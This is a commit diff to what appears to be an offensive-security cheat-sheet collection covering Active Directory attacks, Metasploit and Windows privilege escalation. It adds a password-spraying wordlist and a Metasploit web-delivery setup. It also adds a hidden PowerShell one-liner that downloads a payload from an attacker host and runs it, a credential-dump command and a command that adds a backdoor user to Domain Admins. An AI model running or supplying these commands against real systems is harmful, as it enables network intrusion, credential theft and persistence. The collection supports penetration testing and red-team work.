XSS injection Summary + MSF web delivery

Methodology and Resources/Active Directory Attack.md

@@ -570,6 +570,12 @@ root@kali:~$ ./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt
 root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123
 ```
 
+Most of the time the best passwords to spray are :
+
+- Password1
+- Welcome1
+- $Companyname1
+
 
 ## Privilege Escalation
 
@@ -658,3 +664,4 @@ net group "Domain Admins" hacker2 /add /domain
 * [[PrivExchange] From user to domain admin in less than 60sec ! - davy](http://blog.randorisec.fr/privexchange-from-user-to-domain-admin-in-less-than-60sec/)
 * [Abusing Exchange: One API call away from Domain Admin - Dirk-jan Mollema](https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin)
 * [Red Teaming Made Easy with Exchange Privilege Escalation and PowerPriv - Thursday, January 31, 2019 - Dave](http://blog.redxorblue.com/2019/01/red-teaming-made-easy-with-exchange.html)
+* [Chump2Trump - AD Privesc talk at WAHCKon 2017 - @l0ss](https://github.com/l0ss/Chump2Trump/blob/master/ChumpToTrump.pdf)

Methodology and Resources/Metasploit - Cheatsheet.md

@@ -1,5 +1,25 @@
 # Metasploit
 
+## Summary
+
+* [Installation](#installation)
+* [Sessions](#sessions)
+* [Background handler](#background-handler)
+* [Meterpreter - Basic](#meterpreter---basic)
+    * [Generate a meterpreter](#generate-a-meterpreter)
+    * [Meterpreter Webdelivery](#meterpreter-webdelivery)
+    * [Get System](#get-system)
+    * [Persistence Startup](#persistence-startup)
+    * [Portforward](#portforward)
+    * [Upload / Download](#upload---download)
+    * [Execute from Memory](#execute-from-memory)
+    * [Mimikatz](#mimikatz)
+    * [Pass the Hash - PSExec](#pass-the-hash---psexec)
+* [Scripting Metasploit](#scripting-metasploit)
+* [Multiple transports](#multiple-transports)
+* [Best of - Exploits](#best-of---exploits)
+* [References](#references)
+
 ## Installation
 
 ```powershell
@@ -25,7 +45,7 @@ sessions -c cmd           -> Execute a command on several sessions
 sessions -i 10-20 -c "id" -> Execute a command on several sessions
 ```
 
-## Multi/handler in background (screen/tmux)
+## Background handler
 
 ExitOnSession : the handler will not exit if the meterpreter dies.
 
@@ -60,7 +80,25 @@ $ msfvenom -p cmd/unix/reverse_bash LHOST="10.10.10.110" LPORT=4242 -f raw > she
 $ msfvenom -p cmd/unix/reverse_perl LHOST="10.10.10.110" LPORT=4242 -f raw > shell.pl
 ```
 
-### SYSTEM / Administrator privilege
+### Meterpreter Webdelivery
+
+Set up a Powershell web delivery listening on port 8080.
+
+```powershell
+use exploit/multi/script/web_delivery
+set TARGET 2
+set payload windows/x64/meterpreter/reverse_http
+set LHOST 10.0.0.1
+set LPORT 4444
+run
+```
+
+```powershell
+powershell.exe -nop -w hidden -c $g=new-object net.webclient;$g.proxy=[Net.WebRequest]::GetSystemWebProxy();$g.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $g.downloadstring('http://10.0.0.1:8080/rYDPPB');
+```
+
+
+### Get System
 
 ```powershell
 meterpreter > getsystem
@@ -120,6 +158,7 @@ mimikatz_command -f sekurlsa::searchPasswords
 
 ```powershell
 load kiwi
+creds_all
 golden_ticket_create -d <domainname> -k <nthashof krbtgt> -s <SID without le RID> -u <user_for_the_ticket> -t <location_to_store_tck>
 ```
 

Methodology and Resources/Windows - Privilege Escalation.md

@@ -162,6 +162,12 @@ netsh firewall show state
 netsh firewall show config
 ```
 
+List firewall's blocked ports
+
+```powershell
+$f=New-object -comObject HNetCfg.FwPolicy2;$f.rules |  where {$_.action -eq "0"} | select name,applicationname,localports
+```
+
 List all network shares
 
 ```powershell

Methodology and Resources/Windows - Using credentials.md

@@ -5,6 +5,7 @@
 ```powershell
 net user hacker hacker /add
 net localgroup administrators hacker /add
+net group "Domain Admins" hacker /ADD /DOMAIN
 ```
 
 Some info about your user